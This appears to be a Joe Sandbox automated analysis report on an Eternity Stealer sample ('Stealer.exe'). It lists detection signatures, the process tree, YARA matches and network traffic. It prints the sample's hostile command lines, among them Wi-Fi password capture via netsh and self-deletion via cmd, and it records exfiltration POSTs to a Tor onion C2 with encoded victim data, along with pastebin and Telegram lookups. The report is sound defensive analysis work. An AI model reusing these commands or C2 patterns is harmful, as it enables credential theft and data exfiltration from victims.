Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Stealer.exe

Overview

General Information

Sample name:Stealer.exe
Analysis ID:1417452
MD5:495f88115eabed181e30727f2d2363d3
SHA1:59cd87a7e30926fc7c51a921b78216119f9d4f1c
SHA256:cfef836fa4515f5371b8a30300098bdb03d4c91b123f0a35252757bc73b388f2
Infos:

Detection

Eternity Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Capture Wi-Fi password
Yara detected Eternity Stealer
Connects to a pastebin service (likely for C&C)
Contains functionality to capture screen (.Net source)
Deletes itself after installation
Found Tor onion address
Installs new ROOT certificates
Machine Learning detection for sample
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Self deletion via cmd or bat file
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Uses ping.exe to check the status of other devices and networks
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • Stealer.exe (PID: 2308 cmdline: "C:\Users\user\Desktop\Stealer.exe" MD5: 495F88115EABED181E30727F2D2363D3)
    • cmd.exe (PID: 2436 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • chcp.com (PID: 628 cmdline: chcp 65001 MD5: 0C8C209151A45A4D7774E89C2F4079AA)
      • netsh.exe (PID: 2300 cmdline: netsh wlan show profile MD5: 637982A421D0133DCEAA0D1490D1DC9C)
      • findstr.exe (PID: 2496 cmdline: findstr All MD5: 6A2E9BBD516D064C925A9634A5632854)
    • cmd.exe (PID: 1948 cmdline: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\user\Desktop\Stealer.exe" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • chcp.com (PID: 1912 cmdline: chcp 65001 MD5: 0C8C209151A45A4D7774E89C2F4079AA)
      • PING.EXE (PID: 2636 cmdline: ping 127.0.0.1 MD5: 5FB30FE90736C7FC77DE637021B1CE7C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Stealer.exeJoeSecurity_EternityStealerYara detected Eternity StealerJoe Security
    Stealer.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      Stealer.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x4a07e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x4a0f0:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x4a17a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x4a20c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x4a276:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x4a2e8:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x4a37e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x4a40e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.333992859.0000000000AD2000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_EternityStealerYara detected Eternity StealerJoe Security
        00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
        • 0x5f8cc:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
        Process Memory Space: Stealer.exe PID: 2308JoeSecurity_EternityStealerYara detected Eternity StealerJoe Security
          Process Memory Space: Stealer.exe PID: 2308JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Stealer.exe PID: 2308INDICATOR_SUSPICIOUS_EXE_Discord_RegexDetects executables referencing Discord tokens regular expressionsditekSHen
            • 0x931c3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.0.Stealer.exe.ad0000.0.unpackJoeSecurity_EternityStealerYara detected Eternity StealerJoe Security
              0.0.Stealer.exe.ad0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                0.0.Stealer.exe.ad0000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x4a07e:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x4a0f0:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x4a17a:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x4a20c:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x4a276:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x4a2e8:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x4a37e:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x4a40e:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\Desktop\Stealer.exe, QueryName: ip-api.com

                Stealing of Sensitive Information

                barindex
                Sigma detected: Capture Wi-Fi password
                Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Stealer.exe", ParentImage: C:\Users\user\Desktop\Stealer.exe, ParentProcessId: 2308, ParentProcessName: Stealer.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 2436, ProcessName: cmd.exe

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Stealer.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aaAvira URL Cloud: Label: malware
                Machine Learning detection for sample
                Source: Stealer.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49164 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.22:49165 version: TLS 1.2
                Source: Stealer.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Connects to a pastebin service (likely for C&C)
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: pastebin.com
                Found Tor onion address
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM=&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw==&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg==&t=MzI3
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: khttp://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa2a2c910
                Uses known network protocols on non-standard ports
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 9200
                Source: unknownNetwork traffic detected: HTTP traffic on port 9200 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 9200 -> 49166
                Uses ping.exe to check the status of other devices and networks
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1
                Yara detected Generic Downloader
                Source: Yara matchFile source: Stealer.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.166.166.142:9200
                Source: global trafficHTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/X2Ddjiv0 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 110240Expect: 100-continueConnection: Keep-AliveData Raw: Data Ascii:
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 172.67.34.170 172.67.34.170
                Source: Joe Sandbox ViewIP Address: 172.67.34.170 172.67.34.170
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: C:\Users\user\Desktop\Stealer.exeDNS query: name: ip-api.com
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: unknownTCP traffic detected without corresponding DNS query: 188.166.166.142
                Source: global trafficHTTP traffic detected: GET /tor_proxies HTTP/1.1Host: t.meConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /raw/X2Ddjiv0 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: ip-api.com
                Source: unknownHTTP traffic detected: POST /stld/4c9395d28d054ddebee26b2aa2a2c910?u=QWxidXM%3D&p=NzAxMTg4&i=MTAyLjE2NS40OC40Mw%3D%3D&co=VW5pdGVkIFN0YXRlcyAoVVMp&ci=V2FzaGluZ3Rvbg%3D%3D&t=MzI3 HTTP/1.1Host: izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onionContent-Length: 110240Expect: 100-continueConnection: Keep-AliveData Raw: Data Ascii:
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://izrukvro5khcol3z7cvvdq3akeunlod2gshgn7ppo3a4jvse3z5hpiyd.onion/stld/4c9395d28d054ddebee26b2aa
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.comp
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://t.me
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://t.mep
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn5.cdn-telegram.org/file/urI_EKpgc2j3bnVEG7hJPiftbxwqp29Csge9PUwai_V9SyHDH8vYkc30DN237hWwA
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Stealer.exeString found in binary or memory: https://github.com/L1ghtM4n/TorProxy/blob/main/LIB/Tor.zip?raw=true
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/X2Ddjiv0
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/X2Ddjiv0p
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/cription
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Stealer.exe, 00000000.00000002.466624556.000000001A554000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF1B000.00000004.00000020.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466707746.000000001BF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me
                Source: Stealer.exe, 00000000.00000002.466413641.00000000023CE000.00000004.00000800.00020000.00000000.sdmp, Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/tor_proxies
                Source: Stealer.exe, 00000000.00000002.466413641.00000000022D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/tor_proxiesp
                Source: Stealer.exe, 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Stealer.exe, 00000000.00000002.466413641.000000000227C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.22:49164 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.34.170:443 -> 192.168.2.22:49165 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: Stealer.exe, qq16.cs.Net Code: MakeScreenshot

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Stealer.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 0.0.Stealer.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.466413641.00000000021B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: Process Memory Space: Stealer.exe PID: 2308, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DB2C2D0_2_000007FE93DB2C2D
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DA3BF50_2_000007FE93DA3BF5
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D8CA060_2_000007FE93D8CA06
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D998ED0_2_000007FE93D998ED
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DB0DAA0_2_000007FE93DB0DAA
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DAE2110_2_000007FE93DAE211
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D961B00_2_000007FE93D961B0
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D940D50_2_000007FE93D940D5
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DA47940_2_000007FE93DA4794
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93DA27840_2_000007FE93DA2784
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D8D7B20_2_000007FE93D8D7B2
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D856F10_2_000007FE93D856F1
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D876F00_2_000007FE93D876F0
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D885680_2_000007FE93D88568
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D810080_2_000007FE93D81008
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D810300_2_000007FE93D81030
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D810280_2_000007FE93D81028
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D810200_2_000007FE93D81020
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D810700_2_000007FE93D81070
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D810680_2_000007FE93D81068
                Source: C:\Users\user\Desktop\Stealer.exeCode function: 0_2_000007FE93D8C5090_2_000007FE93D8C509
                Source: Stealer.exe, 00000000.00000000.334000781.0000000000B26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
                Source: Stealer.exe, 00000000.00000002.466352660.000000000035D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Stealer.exe
                Source: Stealer.exeBinary or memory string: OriginalFilenameDeath13.exe: vs Stealer.exe
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: credssp.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: wbemcomn2.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: ntdsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Stealer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: credui.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
